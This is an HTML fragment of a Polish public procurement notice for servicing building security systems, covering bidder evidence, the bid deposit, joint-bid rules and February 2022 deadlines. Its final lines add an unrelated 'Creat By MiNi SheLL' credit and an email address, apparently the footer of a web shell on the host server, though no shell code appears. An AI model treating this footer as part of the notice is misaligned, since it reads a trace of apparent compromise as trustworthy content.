wykonywał<br/>czynności objęte koncesją,<br/>2) pkt 1 ppkt 3) i ppkt 4 lit. b) powinien spełniać co najmniej jeden z tych Wykonawców albo ci<br/>wszyscy Wykonawcy wspólnie,<br/>3) w pkt 1 ppkt 4) lit. a) powinien spełniać co najmniej jeden z tych Wykonawców.<br/>Niniejsze postanowienia stosuje się analogicznie w przypadku polegania przez Wykonawcę na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art.<br/>118 Pzp.<br/>4. Oceniając zdolność techniczną lub zawodową, Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający żąda następującego podmiotowego środka dowodowego:<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- kopię aktualnej Koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego;<br/>W przypadku dwóch lub więcej Wykonawców składających wspólną ofertę (ubiegających się wspólnie<br/>o udzielenie zamówienia), koncesja musi dotyczyć tego (tych) z Wykonawców, który faktycznie będzie<br/>wykonywał czynności objęte koncesją.<br/>- dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejszą niż 250.000,00 PLN.<br/>a) wykazu usług wykonanych (załącznik nr 5 do SWZ), a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzającego, że Wykonawca wykonuje lub wykonał, co najmniej<br/>jedną usługę, polegająca na świadczeniu usługi serwisu i konserwacji systemów bezpieczeństwa w<br/>budynkach zrealizowaną na kwotę nie mniejszą niż 250.000,00 zł brutto (wartość wykazana ma być<br/>wartością jednej umowy na usługę jednorazową lub usługę sukcesywną), wraz z podaniem jej wartości,<br/>przedmiotu usługi, daty wykonania i podmiotu, na rzecz którego usługa została wykonana lub jest<br/>wykonywana oraz załączeniem dowodu(ów) określającego(ych), czy ta usługa została wykonana lub<br/>jest wykonywana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych jest wykonywana, a jeżeli wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – potwierdzającego, że Wykonawca spełnia warunek udziału w postępowaniu określony w rozdziale V pkt 1 ppkt 4 lit. a).<br/>Jeżeli Wykonawca przedstawi w dokumentach złożonych na potwierdzenie spełniania warunków<br/>udziału w postępowaniu wartości wyrażone w innej walucie niż PLN, Zamawiający do oceny spełniania<br/>warunków przeliczy podaną wartość po średnim kursie tej waluty w stosunku do PLN publikowanym<br/>przez NBP obowiązującym w dniu otwarcia ofert, określonym w rozdz. XII.<br/>b) wykazu osób (załącznik nr 6 do SWZ) skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do<br/>wykonania zamówienia publicznego, oraz informacją o podstawie do dysponowania tymi osobami –<br/>potwierdzającego, że Wykonawca spełnia warunek udziału w postępowaniu określony w rozdziale V<br/>pkt 1 ppkt 4 lit. b) t.j.:<br/>Ze względu na ograniczoną ilość znaków pełen opis znajduje się w rozdziale VII SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 15 000,00 PLN (słownie: piętnaście tysięcy<br/>złotych 00/100).<br/>Ze względu na ograniczoną ilość znaków pełna informacja znajduje się w rozdziale XVII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty zgodnie z zapisami w rozdz. XI pkt 9 SWZ.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie wstępne, o którym mowa w rozdz. VII pkt 1, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3.	Podmiotowy środek dowodowy, o którym mowa w rozdz. VII pkt 4 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku, zgodnie z art. 117 ust. 4 Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>5.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców – rozdział XX pkt 6 ppkt 1.<br/>6.	Przepisy Pzp oraz postanowienia niniejszej SWZ dotyczące Wykonawcy, stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na odgraniczoną ilość znaków wszystkie informacje znajdują się w załączniku nr 4 do SWZ paragraf 11 (zmiany postanowień zawartej umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć (umieścić) na platformie pod adresem: https://platformazakupowa.pl/pn/ug (na stronie internetowej prowadzonego postępowania)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-04 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com